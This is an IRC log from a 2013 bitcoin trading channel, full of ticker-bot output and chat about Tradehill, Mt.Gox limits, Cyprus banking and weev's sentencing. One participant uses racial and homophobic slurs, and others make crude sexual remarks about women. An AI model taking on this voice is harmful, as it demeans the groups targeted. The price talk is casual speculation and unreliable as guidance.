mean the bips he has supported in the past Mar 18 21:20:36 ;;bc,stats Mar 18 21:20:39 Current Blocks: 226602 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1205 blocks | Next Difficulty In About: 6 days, 16 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: 6137491.90908 | Estimated Percent Change: 26.60765 Mar 18 21:20:46 I have an old laptop that I can keep my private key, but should I send my public key with my known email? Mar 18 21:21:01 Can other know what I have sold and bought? Mar 18 21:21:02 doesnt really matter Mar 18 21:21:07 jonny7: how anon do you want to be? Mar 18 21:21:27 best practice is the make a fresh key, no matter the email addy (anonymity is the only thing about the associated email address) Mar 18 21:22:07 [BTCTC] [ASICMINER-PT] 1 @ 0.862 BTC [-] Mar 18 21:22:12 smickles: I see Mar 18 21:22:37 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [-] Mar 18 21:23:05 jonny7: others only know what you buy/sell if you provide them with the records - those are encrypted with your key Mar 18 21:23:21 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [-] Mar 18 21:24:15 my way of thinking, if you fear a tyranical gov't, and think that you can actually do something to prevent them getting to you, make a new keypair w/o an associated email address Mar 18 21:24:40 [BTCTC] [BTC-MINING] 1 @ 0.24889 BTC [+] Mar 18 21:24:54 however, i don't think i can escape a tyranical gov't who set their sights on me Mar 18 21:25:25 so it's serves me to have it associated with my email and otc id Mar 18 21:25:30 example: Mar 18 21:25:35 smickles: you might not be able to, but your BTC and your mpex account will make it Mar 18 21:25:47 smickles: So the best is to use a email address that is not tied to me personal in case someone get all the records? Mar 18 21:25:49 you can PUSH assets to me via my otc key fingerprint Mar 18 21:26:14 jonny7: probably. and it's detailed in the FAQ Mar 18 21:26:31 that is how mine is setup, as I am not concerned about the government getting my stuffs Mar 18 21:26:47 I will try to read though it once again Mar 18 21:26:49 smickles are you planing on some sort of web interface for your brokerage or no Mar 18 21:27:14 kakobrekla: i'm winding down the brokerage as i fear it's illegal in my country for me to do that Mar 18 21:27:22 oh Mar 18 21:27:27 do it in another country! Mar 18 21:27:29 :D Mar 18 21:27:45 guruvan: i might once i make a bit more money Mar 18 21:28:20 so i can pay to setup a company in that country off the coast of austrailia Mar 18 21:28:21 moving business out of the US is advisable anyhow Mar 18 21:28:42 yeah Mar 18 21:28:48 all bitcoiners should come to yurop Mar 18 21:28:56 guruvan: well, my primary business is accounting for US citizens Mar 18 21:29:22 you're doing regular fiat-business accounting now (IIRC you were about to get your CPA) Mar 18 21:29:24 kakobrekla: i intend to join mp's harem when i grow up Mar 18 21:29:31 haha Mar 18 21:29:38 see you there then! Mar 18 21:29:52 all bitcoiners should come to yurop and open cypatriot bank accounts Mar 18 21:30:11 well the first part is true Mar 18 21:30:12 smashing idea! Mar 18 21:30:13 [BTCTC] [SYNERGY] 1 @ 0.01699 BTC [+] Mar 18 21:30:32 rally Mar 18 21:30:40 ;;ticker Mar 18 21:30:41 BTCUSD ticker | Best bid: 48.30000, Best ask: 48.46000, Bid-ask spread: 0.16000, Last trade: 48.30000, 24 hour volume: 24392.94339891, 24 hour low: 47.07679, 24 hour high: 48.50000, 24 hour vwap: 47.68841 Mar 18 21:30:51 guruvan: i'm still a ways off from my CPA (having kids slows the process down). Mar 18 21:31:01 sweet. I do love rallies right after I buy some coins Mar 18 21:31:44 [BTCTC] [B.YABMC] 1 @ 0.01962 BTC [+] Mar 18 21:32:13 [BTCTC] [B.YABMC] 1 @ 0.01963 BTC [+] Mar 18 21:32:24 !l glbse yabmc Mar 18 21:32:25 Last trade for YABMC on GLBSE was at 0.0769 BTC [+] Mar 18 21:32:59 also, CPA is kinda a "good 'ol boys" club in that you have to have years of exp. under another cpa. so, as I own my own accounting company, i'm not getting the right kind of exp. Mar 18 21:34:44 [BTCTC] [BTC-GOLD] 4 @ 0.005 = 0.02 BTC [-] Mar 18 21:35:49 [BTCTC] [S.BBET-PT] 1 @ 0.00179 BTC [+] Mar 18 21:35:51 wow, what a nick Mar 18 21:36:35 all those things are good ol boys clobs....nothing as bad as a series 7 broker license AFAICT though Mar 18 21:38:56 ;;goxlag Mar 18 21:38:57 0 seconds Mar 18 21:40:03 ;;tslb Mar 18 21:40:10 Time since last block: 6 minutes and 36 seconds Mar 18 21:41:18 [BTCTC] [BASIC-MINING] 1 @ 0.3448 BTC [+] Mar 18 21:41:51 all bitcoiners should come to yurop << totally. Mar 18 21:42:46 [BTCTC] [BASIC-MINING] 2 @ 0.349 = 0.698 BTC [+] Mar 18 21:42:48 [BTCTC] [BASIC-MINING] 14 @ 0.3499 = 4.8986 BTC [+] Mar 18 21:43:58 give the proper props Mar 18 21:44:15 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [+] Mar 18 21:44:21 [MPEX] [S.DICE] 2027 @ 0.0051 = 10.3377 BTC [+] Mar 18 21:46:32 [BTCTC] [COGNITIVE] 1 @ 0.2689 BTC [+] Mar 18 21:46:57 good ol series 7 Mar 18 21:47:09 good ol sec Mar 18 21:49:47 yo smickles mah man Mar 18 21:50:10 hey you gonna pay the .5 btc or what :p Mar 18 21:50:24 didnt i sign for that? Mar 18 21:50:36 the what Mar 18 21:50:54 the .5 for data. i thought smickles was authed to send it to you Mar 18 21:51:04 nothing happend Mar 18 21:51:25 can you pm me address and I will send smickles gpg mail when I get home Mar 18 21:51:29 i am at work Mar 18 21:51:57 k Mar 18 21:59:07 kakobrekla: I didn't send it b/c you said not to, so i left it alone Mar 18 21:59:08 :P Mar 18 21:59:26 perhaps there was some kind of miscommunication Mar 18 21:59:37 perhaps Mar 18 21:59:44 no biggie Mar 18 21:59:54 you want it now? Mar 18 22:01:56 i thought thestringpuller must send you gpg mail before that Mar 18 22:02:09 ;> Mar 18 22:12:37 kakobrekla: he was identified with gribble when he originally told me to do it Mar 18 22:13:07 ah Mar 18 22:13:11 wts C2000, maybe C5000 even. << seeing how the c75 is like... 5 cents Mar 18 22:13:17 ok well you can hit me up here then 1B6NP9eb4RKy9tRrXYCJnNcenZkrt5Q2gb Mar 18 22:13:30 ;;ident kakobrekla Mar 18 22:13:30 Nick 'kakobrekla', with hostmask 'kakobrekla!~kako@unaffiliated/kakobrekla', is not identified. Mar 18 22:13:34 -_- Mar 18 22:13:40 IM SCAMMIN FOR 0.5 BTC Mar 18 22:13:43 DONTYAKNOW Mar 18 22:13:55 "I've recently lunched"... ahahahaha ok Mar 18 22:14:10 ;;ident kakobrekla Mar 18 22:14:11 Nick 'kakobrekla', with hostmask 'kakobrekla!~kako@unaffiliated/kakobrekla', is identified as user kakobrekla, with GPG key id 27AF75321F2489E8, key fingerprint 27C3CE9A20851312F086268C27AF75321F2489E8, and bitcoin address None Mar 18 22:14:15 lies Mar 18 22:14:18 thar. Mar 18 22:14:33 had to join otc Mar 18 22:14:38 semi relevant line there Mar 18 22:14:38 21:14.17 ( sturles ) Anyay -- Cyprus is just a tiny bit of the Euro economy. The EUR itself won't notice. Mar 18 22:15:39 orly. Mar 18 22:15:54 that;s why when i cashed out 10k rons today they only had 9k in the entire bank Mar 18 22:16:28 guy was like "can be 9800 if we include the 10 ron bills" (ie, 2.5 euro bills) Mar 18 22:16:33 or w/e, 2.25 Mar 18 22:17:35 sorry i just had to poke Mar 18 22:17:35 21:14.32 ( kakobrekla ) had to join otc Mar 18 22:17:35 21:14.37 ( kakobrekla ) semi relevant line there Mar 18 22:17:36 21:14.37 ( kakobrekla ) 21:14.17 ( sturles ) Anyay -- Cyprus is just a tiny bit of the Euro economy. The EUR itself won't notice. Mar 18 22:17:36 21:15.39 ( mircea_popescu ) orly. Mar 18 22:17:36 21:15.54 ( mircea_popescu ) that;s why when i cashed out 10k rons today they only had 9k in the entire bank Mar 18 22:17:36 21:16.23 .•• info: ( sturles )/( ~sturles@unaffiliated/sturles ) opened a query with you: What happens there? Mar 18 22:17:36 21:16.28 ( mircea_popescu ) guy was like "can be 9800 if we include the 10 ron bills" (ie, 2.5 euro bills) Mar 18 22:17:37 21:16.32 ( mircea_popescu ) or w/e, 2.25 Mar 18 22:17:47 anything to add? Mar 18 22:18:26 smickles recieved Mar 18 22:18:41 < mircea_popescu> "I've recently lunched"... ahahahaha ok << i was probably hungry Mar 18 22:18:59 sounds like it Mar 18 22:19:24 https://bitcointalk.org/index.php?topic=154258.msg1637688#msg1637688 Mar 18 22:19:26 ha! Mar 18 22:20:09 mircea_popescu you need a fan club! Mar 18 22:20:15 lol Mar 18 22:20:22 those 173 reads were probably bots Mar 18 22:21:03 but make it so it pays out dividends or something Mar 18 22:21:29 yeah, either tits or btc to join Mar 18 22:21:43 male tits count? Mar 18 22:21:48 uh, should i add comment there "such structure shoudl be called a fan club"? Mar 18 22:22:02 kakobrekla male tits and fiat btc are outside of the scope of this conversation Mar 18 22:22:07 by the way mircea_popescu, you may already have heard about the return of tradehill, but we had a good laugh about it in the scrollback buffer Mar 18 22:22:07 jurov :) Mar 18 22:22:14 the what ?! Mar 18 22:22:26 oh yeah Mar 18 22:22:28 dude whenever i go out on the prowl all the good stuff happens. Mar 18 22:22:28 >.> tradehill.com Mar 18 22:22:30 you keep missing the good stuff Mar 18 22:22:49 kakobrekla well at least i lashed this chick with her doggylash... Mar 18 22:23:01 seriously, its only a fan club for accredited investors so no regulatory issues Mar 18 22:23:04 ok apparently we are missing he good stuff Mar 18 22:23:09 the* Mar 18 22:23:41 kakobrekla what stuff? suddenly you desire some lashing, too? Mar 18 22:23:46 this is how you know that absolutely 200% of what tradehill is saying is utter bullshit Mar 18 22:23:49 https://bitcointalk.org/index.php?topic=154527.msg1637912#msg1637912 Mar 18 22:24:12 jurov what makes you think im on that side? Mar 18 22:24:15 "Will Tradehill support other crypto-currencies in the near future? Short answer: Yes. " Mar 18 22:24:34 i expected to hear "Goat brings LTC to Wallstreet" but not tradehill Mar 18 22:24:34 pigeons let me guess. don't spoil it for me. Mar 18 22:24:35 jeez Mar 18 22:24:40 kako, what other are you missing then? Mar 18 22:24:49 they're either a. going to be the new coinlab or else b. going to be the larger bitfloor Mar 18 22:24:50 which is it ? Mar 18 22:24:58 they intend to be a Mar 18 22:25:17 The new site goes live today with a new business-focused product dubbed “Prime.” Mar 18 22:25:28 jurov the side of giving the lashing you know Mar 18 22:25:38 "Singer said the company made the decision to keep the Tradehill name as it’s an “established brand” with a strong network." Mar 18 22:25:44 kakobrekla btw, diod you see the idiot who sent btc to primeasic ? Mar 18 22:25:53 i did not!? Mar 18 22:25:58 dis a joke? Mar 18 22:25:59 dig the thread. Mar 18 22:26:01 its for reals. Mar 18 22:26:14 pigeons wait, singer ? who ? Mar 18 22:26:55 http://venturebeat.com/2013/03/18/embattled-bitcoin-exchange-tradehill-is-back/ Mar 18 22:27:05 makes me sick, the name. Mar 18 22:27:09 we already made fun of it Mar 18 22:28:03 there's not even any reading between the lines to find the true stupid, its explicit Mar 18 22:28:08 gotta love the free market! Mar 18 22:29:34 I am User 472 on the bitcoin pyramid wich was a tradehill acount address... ( I stupidly used you as a wallet ) Mar 18 22:29:40 oh noooo Mar 18 22:29:50 rofl Mar 18 22:30:37 so will non us/canada folk be able to trade btc/usd on mtgox without the traders having an account/relationship with coinlol? Mar 18 22:31:00 afaik no Mar 18 22:31:00 pigeons only if they have good personal / otc relationships with actual people in actual countries. Mar 18 22:31:13 hm? Mar 18 22:31:31 but anyway, i would say this is the largest degradation of personal status us citizens have suffered to date. Mar 18 22:31:55 maybe then tradehill hopes to get some of the flight capital in those mtgusd codes since they are deprecated and in a few weeks the codes discontinued Mar 18 22:32:18 everyone who wants to continue using mtgox will be required to file SEC papers. in person. Mar 18 22:32:19 mircea_popescu: non-us/canada Mar 18 22:32:43 i mean will say, eurpoeans be able to trade btc/usd on gox, or will gox not offer trading in that currency Mar 18 22:32:59 jurov you seen that scene in black cat / white cat when the fat singer woman delivers the irs nail ? Mar 18 22:33:14 prolly not Mar 18 22:33:35 pigeons ahaha mtgox a market for eurodollars Mar 18 22:34:02 well they arent really spelling much out Mar 18 22:34:20 ah i missed the 'non' too Mar 18 22:34:24 jurov http://www.youtube.com/watch?v=d7CQ19uNF28 ~4 min Mar 18 22:34:32 as long as you comply it should work Mar 18 22:35:30 coinlab was sucessful with their nonsense pr spin, a lot of people in otc and the forums (yeah i know) are totally convinced that coinlab is allowing all americans to buy bitcoins at their neighborhood bank Mar 18 22:37:51 ya well... good for 'em. Mar 18 22:38:01 as long as they don't get any dough that conviction will stand Mar 18 22:38:26 o hey, gemma godfrey retweeted me. Mar 18 22:38:29 that chick is hawt. Mar 18 22:39:52 hotter side on Mar 18 22:40:00 and she knows this Mar 18 22:40:45 well... she'd be stupid not to. Mar 18 22:43:09 [MPEX] [S.DICE] 1500 @ 0.0051 = 7.65 BTC [+] Mar 18 22:43:25 I don't know if I'm hotter side on Mar 18 22:43:59 [HAVELOCK] [SDICE] 5 @ 0.532 = 2.66 BTC [+] Mar 18 22:44:22 you're not a woman. Mar 18 22:44:35 [MPEX] [S.DICE] 500 @ 0.0051 = 2.55 BTC [+] Mar 18 22:45:53 [BTCTC] [ASICMINER-PT] 1 @ 0.870899 BTC [+] Mar 18 22:45:59 [HAVELOCK] [SDICE] 1 @ 0.5301 BTC [-] Mar 18 22:46:23 lmao @us feds. "weev can do arithmetics. clearly special skills" Mar 18 22:53:53 !ticker mpex s.dice Mar 18 22:53:55 [MPEX:S.DICE] 1D: 0.004501 / 0.00506929 / 0.0051 (6827 shares, 34.61 BTC), 7D: 0.00444444 / 0.00514093 / 0.00599987 (75748 shares, 389.42 BTC), 30D: 0.00300001 / 0.00609766 / 0.0069 (2301468 shares, 14,033.57 BTC) Mar 18 22:56:10 poor fuckin weev, he's a dumbass, but not 41 months in prison dumb-ass Mar 18 22:56:32 think an appeal will do him any good? Mar 18 22:56:38 who is weev Mar 18 22:56:43 seems they have their man for pinning computer crime on. Mar 18 22:56:44 standby Mar 18 22:57:17 yeah i had to google it too Mar 18 22:57:23 http://www.huffingtonpost.com/2013/03/18/andrew-weev-auernheimer_n_2900387.html Mar 18 22:57:31 i hate huff-po but it's up to date Mar 18 22:58:19 the gay nigger association president guy Mar 18 22:58:24 i'll stick with wikipedia for my politically biased information Mar 18 22:58:33 basically all the faggots and niggers in the us govt are a little sore in the bum. Mar 18 22:58:56 a light penalty for owning apple imho Mar 18 22:59:16 hahaha Mar 18 22:59:21 he... owned it, not owned it :D Mar 18 22:59:43 idiots everywhere Mar 18 22:59:48 wtf hacker and not tor Mar 18 23:00:06 i mean for apple owners Mar 18 23:00:13 benkay he didn't hack it tho. Mar 18 23:00:18 more apropriate would be for their devices to assplode Mar 18 23:00:24 i can read. Mar 18 23:00:29 some days. Mar 18 23:00:31 benkay: i don't get it either, no tor, he's kind of a twat Mar 18 23:00:41 but he voluntarily doxed himself Mar 18 23:00:45 so ? Mar 18 23:00:54 and then went to jail Mar 18 23:01:12 if you're going to publish vulnerabilities in the systems run by the companies that run the usg Mar 18 23:01:19 best to not idiot. Mar 18 23:01:37 ya well... he's charged with breaking and entering except hte place had no lock or walls. Mar 18 23:01:41 esp not in the us. Mar 18 23:01:46 but apparently can't in2 power structure theory Mar 18 23:01:52 doesn't matter Mar 18 23:01:53 is there a 'safe' way to do so? Like the administration of security and silicon Mar 18 23:01:56 or ASS Mar 18 23:02:02 law doesn't care about actual laws Mar 18 23:02:11 could i go up to ASS and offer up a vuln? Mar 18 23:02:12 at least in this country Mar 18 23:02:14 ya but i dopn't care what the law cares or not about. Mar 18 23:02:26 two can play the game. Mar 18 23:02:33 ;;ticker Mar 18 23:02:34 BTCUSD ticker | Best bid: 48.18997, Best ask: 48.41900, Bid-ask spread: 0.22903, Last trade: 48.18997, 24 hour volume: 35238.49364250, 24 hour low: 47.11111, 24 hour high: 48.88300, 24 hour vwap: 47.99086 Mar 18 23:02:42 i dont care what mircea_popescu cares about what the law cares about Mar 18 23:03:00 all that I'm saying is that he's a moron for not protecting his identity while trolling at the leviathan. Mar 18 23:03:03 ;;asks 50 Mar 18 23:03:07 -> trolling the leviathan. Mar 18 23:03:07 ;;asks 49 Mar 18 23:03:10 and I don't care what pigeons cares about what mircea_popescu about what the law cares about Mar 18 23:03:10 There are currently 24049.14 bitcoins offered at or under 50.0 USD, worth 1194209.0516 USD in total. | Data vintage: 0.0021 seconds Mar 18 23:03:11 There are currently 4805.0265 bitcoins offered at or under 49.0 USD, worth 234597.12888 USD in total. | Data vintage: 0.0055 seconds Mar 18 23:03:19 what fun is it to troll from behind a mask Mar 18 23:03:28 ask 4chan Mar 18 23:03:34 or anon Mar 18 23:03:53 benkay where did you get this idea the us govt is powerful, or respectable or something ? Mar 18 23:04:03 4chan isn't fun, 4chan is like a beetle who fell into boiling water Mar 18 23:04:08 [MPEX] [S.MPOE] 8294 @ 0.00073964 = 6.1346 BTC [+] Mar 18 23:04:12 aww poor beetle! Mar 18 23:04:13 anyway, it's a bad precedent. it should scare everyone. Mar 18 23:04:16 it knows something is wrong, prolly doesn't feel pain, then dies Mar 18 23:04:16 the idea i have is that the usg is a tool our corporations use to maintain the status quo. Mar 18 23:04:32 we use computers, they are putting people in jail who use them stupidly. most people are stupid. Mar 18 23:04:32 time for a little Mar 18 23:04:38 ;;google the crime of being american Mar 18 23:04:40 America's Real Criminal Element: Lead | Mother Jones: ; Crime in the United States - Wikipedia, the free encyclopedia: ; Laila al-Marayati and Basil Abdelkarim - The Crime of Being a ...: omfg i r censorated! Mar 18 23:05:14 http://trilema.com/2012/the-crime-of-being-american/ Mar 18 23:05:18 so most people will eventually be in jail, in the country with the largest prison population. Mar 18 23:05:18 old -assets log. Mar 18 23:05:44 [BTCTC] [PAJKA.BOND] 2 @ 0.105 = 0.21 BTC [-] Mar 18 23:09:12 yeah, that's about right, and why people should be pissed off about weev Mar 18 23:09:24 good explanatory cartoon Mar 18 23:09:31 guy is smart Mar 18 23:09:42 is virwox dead ? Mar 18 23:09:57 the escape films come to mind :) Mar 18 23:09:58 a just very slow Mar 18 23:10:06 virwox is working Mar 18 23:10:10 escape from la / new yourk Mar 18 23:10:15 york Mar 18 23:10:24 Q : is there any stop order system for trading at mtgox? A : We do not offer such possibility as of yet but probably in the future. Mar 18 23:10:50 goat brings litecoin to wall street Mar 18 23:10:58 whatever they do is gonna suck Mar 18 23:11:01 so, fine, the law is used to jail people indiscriminately. the powers that be here use this to their advantage to jail anyone who does things they dislike. Mar 18 23:11:07 the correct thing is to put btc in MT4 or some such Mar 18 23:11:21 MT5 Mar 18 23:11:23 didn't learn anything new there. Mar 18 23:11:39 MT5 is kinda not popular for live trading yet Mar 18 23:11:47 at least so i hear from the pros Mar 18 23:11:48 benkay you learned that you're a bad person for being american. Mar 18 23:11:55 seems so kakobrekla Mar 18 23:11:56 ff i hang out here Mar 18 23:11:59 knew that too Mar 18 23:12:10 well then it's all old news Mar 18 23:12:16 well, knew you think that. Mar 18 23:12:59 "Thank you for your message. We are currently experiencing delays on EUR transfers of up to two weeks for larger transfers because of the daily limits imposed by our bank in Europe. " Mar 18 23:13:16 gox = fucked Mar 18 23:13:17 coinlab should open a european subsidiary. problem solved. Mar 18 23:13:35 i hear good things about cyprus offshore banking. Mar 18 23:13:46 only Weev has an appeal left, that's new news, the interesting kind, especially if you live in America and don't want your door kicked in for 'computer crime' Mar 18 23:14:07 kakobrekla: have someone buy your mtgoxeur cupon codes? Mar 18 23:14:19 ;;goxlag Mar 18 23:14:20 0.045015 seconds Mar 18 23:14:21 i dont have that issue Mar 18 23:15:19 [BTCTC] [S.MPOE-PT] 3 @ 0.000674 = 0.002 BTC [-] Mar 18 23:15:20 [BTCTC] [S.MPOE-PT] 3 @ 0.000674 = 0.002 BTC [-] Mar 18 23:15:52 [MPEX] [S.MPOE] 3393 @ 0.00073964 = 2.5096 BTC [+] Mar 18 23:15:54 [MPEX] [S.MPOE] 3097 @ 0.00071871 = 2.2258 BTC [-] Mar 18 23:16:07 [BTCTC] [S.MPOE-PT] 44 @ 0.000673 = 0.0296 BTC [-] Mar 18 23:16:27 !ticker mpex s.dice Mar 18 23:16:29 [MPEX:S.DICE] 1D: 0.004501 / 0.00506929 / 0.0051 (6827 shares, 34.61 BTC), 7D: 0.00444444 / 0.00514093 / 0.00599987 (75748 shares, 389.42 BTC), 30D: 0.00300001 / 0.00609766 / 0.0069 (2301468 shares, 14,033.57 BTC) Mar 18 23:17:05 [BTCTC] [S.MPOE-PT] 10 @ 0.000673 = 0.0067 BTC [-] Mar 18 23:17:30 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 18 23:18:49 which will be more successful, coinlab or http://satoshiroulette.com/index2.php?mode=NVC Mar 18 23:18:52 [BTCTC] [BTC-GOLD] 1 @ 0.005 BTC [-] Mar 18 23:20:50 or tradehill Mar 18 23:21:03 or the unnoffical fanclub of ognasty Mar 18 23:22:54 48.5 :) Mar 18 23:25:10 lets if breaks 50 Mar 18 23:25:16 ;;asks 50 Mar 18 23:25:17 "Tradehill was the first institution in the Bitcoin market to hold millions of dollars in user funds and process full payouts. Every other Bitcoin company that achieved scale either lost money in a hack or went insolvent." Mar 18 23:25:23 There are currently 24220.821 bitcoins offered at or under 50.0 USD, worth 1202584.23481 USD in total. | Data vintage: 0.0021 seconds Mar 18 23:25:43 so tradehill wasn't insolvent, they just ran out of money Mar 18 23:27:58 and not a lot of difference if you lose money in a hack or in a chargeback Mar 18 23:27:59 [BTCTC] [B.YABMC] 2 @ 0.00821 = 0.0164 BTC [-] Mar 18 23:34:08 did they even fully pay back? Mar 18 23:35:31 pigeons what asshats lmao Mar 18 23:35:59 i wonder how long before bitcoin wanna-be entrepreneurs learn that lieing is not pr. Mar 18 23:36:26 so who want to do currenex for btc with me so i can plug in mt Mar 18 23:37:27 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 18 23:37:34 pigeons https://bitcointalk.org/index.php?topic=154566.0 youi still on btcjam ? Mar 18 23:38:27 [MPEX] [O.BTCUSD.C430T] 4 @ 0.19918847 = 0.7968 BTC [+] Mar 18 23:39:23 i promisse its not gonna be php Mar 18 23:39:55 http://bitbet.us/bet/283/btc-usd-at-mtgox-will-hit-50-in-march/#c385 Mar 18 23:39:58 goat brings litecoin to wall street lol Mar 18 23:40:01 inquiring minds wish to know Mar 18 23:41:17 [MPEX] [O.BTCUSD.P470T] 1 @ 0.08375067 BTC [-] Mar 18 23:41:18 [MPEX] [O.BTCUSD.P490T] 1 @ 0.10400065 BTC [-] Mar 18 23:41:21 [MPEX] [O.BTCUSD.P450T] 1 @ 0.0640216 BTC [-] Mar 18 23:41:27 [BTCTC] [S.MPOE-PT] 253 @ 0.000673 = 0.1703 BTC [-] Mar 18 23:41:29 [BTCTC] [S.MPOE-PT] 37 @ 0.000673 = 0.0249 BTC [-] Mar 18 23:41:32 not sure if wall streat is ready yet for the power of ltc :) Mar 18 23:42:02 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 18 23:42:14 lulz the coin? Mar 18 23:43:25 ;;ticker Mar 18 23:43:27 BTCUSD ticker | Best bid: 48.50025, Best ask: 48.65000, Bid-ask spread: 0.14975, Last trade: 48.65000, 24 hour volume: 36380.14935109, 24 hour low: 47.12009, 24 hour high: 48.88300, 24 hour vwap: 48.01748 Mar 18 23:44:24 mircea_popescu: no i never found anything on btcjam it was just for comedy, but its all reruns Mar 18 23:44:26 you ever get on that rocket kako :) Mar 18 23:45:19 ;;ticker Mar 18 23:45:21 BTCUSD ticker | Best bid: 48.90000, Best ask: 48.95775, Bid-ask spread: 0.05775, Last trade: 48.90000, 24 hour volume: 39353.49357783, 24 hour low: 47.12009, 24 hour high: 49.00000, 24 hour vwap: 48.07990 Mar 18 23:45:30 ;;calc 0.02101723 * 48.07990 Mar 18 23:45:31 1.01050631668 Mar 18 23:45:42 ;;asks 49.2 Mar 18 23:45:49 There are currently 1875.6022 bitcoins offered at or under 49.2 USD, worth 92021.233743 USD in total. | Data vintage: 0.0018 seconds Mar 18 23:46:04 Chaang-Noi how much you put down for ltc is above 0.01 btc at the end of 2013 Mar 18 23:46:40 what? Mar 18 23:47:03 iv sold 75k above .01 this year Mar 18 23:47:09 a bit more than that Mar 18 23:47:14 why do you ask? Mar 18 23:47:26 yeah, my guess is its below 0.01 at the end of the year Mar 18 23:47:40 oh, what do i think the price will be? Mar 18 23:47:52 was wondering if youd bet on that since you seem to be lite jesus Mar 18 23:48:03 good question but if i were to bet on even odds i would say over .01 Mar 18 23:48:11 yeah ill make a bet with you Mar 18 23:48:19 bitbet Mar 18 23:48:22 lite jesus, lol Mar 18 23:48:36 oh no, im not going to do bitbet, ill makea bet with you personally if you want Mar 18 23:48:48 wat Mar 18 23:49:22 i bet matthew n wright pays Mar 18 23:49:25 btw im no where near the largest ltc holder, wish i was :) Mar 18 23:49:40 pigeons i hope so, he owes me 5000 ltc:) Mar 18 23:49:43 i mean btc Mar 18 23:49:56 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [-] Mar 18 23:50:11 cognitive was just at .11 Mar 18 23:50:22 nature is amazing. Mar 18 23:50:30 [BTCTC] [PAJKA.BOND] 3 @ 0.105 = 0.315 BTC [-] Mar 18 23:50:34 [MPEX] [S.BBET] 12450 @ 0.0018 = 22.41 BTC [+] Mar 18 23:50:54 bbet ftw Mar 18 23:51:44 so people ask me "ok 1 dollar buys 1000 trilema credits, but how many credits do you need to read an article ?" Mar 18 23:51:48 and i answer. "one". Mar 18 23:51:48 problem with bitbet is you have no idea what the odds are when the bet ends Mar 18 23:51:51 why isn't this obvious tho ?! Mar 18 23:52:14 nope not obvious Mar 18 23:52:46 why not tho ?! Mar 18 23:53:12 cause when you make an assumption, you make an ass out of u and umption Mar 18 23:53:21 i guess so... Mar 18 23:53:38 ath????? Mar 18 23:53:46 still... i mean notionally. "a credit". well... a credit to what 1/3 read ? Mar 18 23:53:51 ;;ticker Mar 18 23:53:52 BTCUSD ticker | Best bid: 48.90013, Best ask: 48.99239, Bid-ask spread: 0.09226, Last trade: 48.99239, 24 hour volume: 39722.91241967, 24 hour low: 47.12009, 24 hour high: 49.00000, 24 hour vwap: 48.09012 Mar 18 23:54:08 ? Mar 18 23:54:15 dis bot slow? Mar 18 23:54:37 i always wondered, now i know 1 credit per article Mar 18 23:54:47 Mar18 21:54:20 mtgox x11 211.8929 @ 49.1439944 USD Mar 18 23:55:02 high was 49.09 right? Mar 18 23:55:12 i see it at 49 even Mar 18 23:55:12 ;;goxlag Mar 18 23:55:14 15.396683 seconds Mar 18 23:55:14 i probably would have bought some in the past if a btc address was generated automatically, but i aint gonna email someone to get an address for his blog Mar 18 23:55:39 i saw it trade at 49.15 Mar 18 23:55:40 pigeons i got too lazy to implement bitpay or w./e the solution is Mar 18 23:56:06 oh a nice 15 sec Mar 18 23:56:14 doing well today! Mar 18 23:56:28 ;;goxlag Mar 18 23:56:30 38.859968 seconds Mar 18 23:56:32 ha Mar 18 23:56:36 love this Mar 18 23:56:49 lew rockwell : "This proves that the licensing was – and always will be – a scheme merely to fill government coiffures." Mar 18 23:56:52 isn't he adorable ? Mar 18 23:56:53 someone just buys it all up at once, after no volume at all Mar 18 23:56:54 coiffures! Mar 18 23:57:14 heh Mar 18 23:57:19 i want to fill the government hair. Mar 18 23:57:37 um, with what, benkay? Mar 18 23:57:48 use your imagination, deadweasel. Mar 18 23:57:50 mp might make a video of you doing it Mar 18 23:57:56 and chargeyou to watch it Mar 18 23:57:59 http://polimedia.us/dtng/c/src/136342487995.jpg illustration. Mar 18 23:58:27 right, that's the ticket Mar 18 23:59:12 ejacualtion killed her? Mar 18 23:59:29 kakobrekla if you fuck a girl long enough, eventually she enters this zombie state Mar 18 23:59:35 remove the question mark and that's your title Mar 19 00:00:18 49.64 ) Mar 19 00:00:34 ;;asks 50 Mar 19 00:00:35 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 19 00:00:36 There are currently 15706.82 bitcoins offered at or under 50.0 USD, worth 784550.15041 USD in total. | Data vintage: 21.4370 seconds Mar 19 00:01:09 if we eat 50 no stopping us until 80 Mar 19 00:01:15 kakobrekla, that's a hell of a wall at 50 Mar 19 00:01:28 well dude's got balls Mar 19 00:01:51 49.7 Mar 19 00:02:17 "/msg Chaang-Noi ;;ticker" Mar 19 00:02:29 ;;bc,convert eur Mar 19 00:02:30 1 BTC = 48.99239 U.S. dollars = 37.7852769 Euros Mar 19 00:02:43 what was the ATH exactly? Mar 19 00:02:46 jk Chaang-Noi Mar 19 00:02:48 ;D im happy at ATH'z Mar 19 00:02:58 ATH is all time high Mar 19 00:03:20 yeaaa, the number plz Mar 19 00:03:28 49.7 Mar 19 00:03:47 kakobrekla who actually can take out 3/4 mn usd fgrom mthox ? Mar 19 00:03:55 it would take what, 2-3 years to make it through ? Mar 19 00:03:55 ;;yeaaa, the number plz Mar 19 00:03:56 Error: "yeaaa," is not a valid command. Mar 19 00:04:08 they raised my limit to 50k overnight Mar 19 00:04:31 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 19 00:04:34 50k < 783k Mar 19 00:04:39 mircea_popescu i dunno, but it has to be done Mar 19 00:04:50 total bid: 8,389,663 USD | total ask: 82,782 BTC | ratio: 101.35 USD/BTC Mar 19 00:05:22 Trusted accounts can withdraw 50k at a time, 500k / mo Mar 19 00:05:41 ;;ticker --last Mar 19 00:05:43 48.99239 Mar 19 00:06:02 crash, back down to 32 :) Mar 19 00:06:42 its incredible just how inadequate fiat is when one looks from the vantage of btc Mar 19 00:07:46 correction $100k max wire size per day with trusted Mar 19 00:08:00 you should tell sgornick that mp Mar 19 00:08:05 he would smile Mar 19 00:08:24 hehe Mar 19 00:08:35 Bugpowder ya but how long it actually takes is the q. Mar 19 00:08:42 ;;goxlag 